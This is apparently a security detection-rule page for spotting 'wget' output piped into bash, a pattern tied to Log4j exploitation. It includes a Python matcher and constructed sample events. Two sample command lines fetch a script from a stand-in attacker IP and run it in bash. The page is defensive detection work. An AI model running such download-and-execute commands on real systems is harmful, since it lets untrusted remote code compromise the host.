
Summary
This analytic rule detects potentially malicious use of the `wget` command on Windows, Linux, and macOS systems to download a file from a remote location and pipe it directly into `bash` for execution. This behavior is important to monitor because it is commonly associated with malware delivery and exploitation attempts, notably exploitation of CVE-2021-44228 (the Log4j vulnerability). The detection analyzes event logs collected by Endpoint Detection and Response (EDR) agents, specifically process execution events and their command-line arguments. By identifying `wget` invocations that combine a quiet-mode flag with output redirected into `bash`, the rule can flag and alert on suspicious activity that could lead to system compromise or unauthorized data access.
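The pattern the rule describes, implemented as an added Python example over constructed EDR process events (not the rule's own query or code); it matches on the command line rather than the process name so that `sh -c "wget ... | bash"` wrappers are caught, and, going slightly beyond the text, it also treats a pipe into `sh` as a hit. Host names, users, and URLs in the sample events are assumptions.

```python
import re
from dataclasses import dataclass

# A wget invocation anywhere in the command line, bare or with a path, possibly quoted.
WGET_RE = re.compile(r"(?:^|[\s;&|(\"'])(?:\S*/)?wget(?=\s)")
# Quiet mode: --quiet, -q, or a bundled short-option group containing q (e.g. -qO-).
QUIET_RE = re.compile(r"(?<!\S)(?:--quiet|-[A-Za-z]*q\S*)(?=\s|$)")
# A single pipe (not ||) into bash or sh, with or without a /bin or /usr/bin prefix.
PIPE_SHELL_RE = re.compile(r"(?<!\|)\|(?!\|)\s*(?:/(?:usr/)?bin/)?(?:bash|sh)(?![\w.-])")

@dataclass
class ProcessEvent:
    host: str
    user: str
    process_name: str
    process_cmdline: str

def is_wget_pipe_to_shell(cmdline: str) -> bool:
    """True when cmdline runs wget in quiet mode and pipes its output into a shell."""
    for m in WGET_RE.finditer(cmdline):
        rest = cmdline[m.end():]
        pipe = PIPE_SHELL_RE.search(rest)
        if pipe is None:
            continue
        # Only the arguments between wget and the shell pipe belong to this wget.
        parts = re.split(r";|&&|\|\|", rest[:pipe.start()], maxsplit=1)
        if len(parts) > 1:
            continue  # a separator sits in between: the pipe feeds a later command
        if QUIET_RE.search(parts[0]):
            return True
    return False

def scan(events):
    """Return the events whose command line matches the wget-to-shell pattern."""
    return [e for e in events if is_wget_pipe_to_shell(e.process_cmdline)]

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    ProcessEvent("web01", "tomcat", "sh", 'sh -c "wget -qO- http://198.51.100.7/x.sh | bash"'),
    ProcessEvent("build02", "jenkins", "wget", "wget -q https://example.com/release.tar.gz -O release.tar.gz"),
    ProcessEvent("dev03", "alice", "bash", "bash -c 'wget --quiet -O - http://198.51.100.7/s | /bin/bash'"),
    ProcessEvent("dev04", "bob", "wget", "wget -O - https://example.com/list.txt | grep -c foo"),
    ProcessEvent("dev05", "carol", "sh", "sh -c 'wget -q http://198.51.100.7/a || bash'"),
]

if __name__ == "__main__":
    for e in scan(SAMPLE_EVENTS):
        print(f"ALERT host={e.host} user={e.user} cmd={e.process_cmdline}")
```

Only the first and third events are flagged: the second has no pipe, the fourth pipes into `grep`, and the fifth uses `||` rather than a pipe.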
Categories
- Endpoint
- Linux
- macOS
- Windows
Data Sources
- Windows Registry
- Process
- Command
- Application Log
ATT&CK Techniques
- T1105
Created: 2024-12-10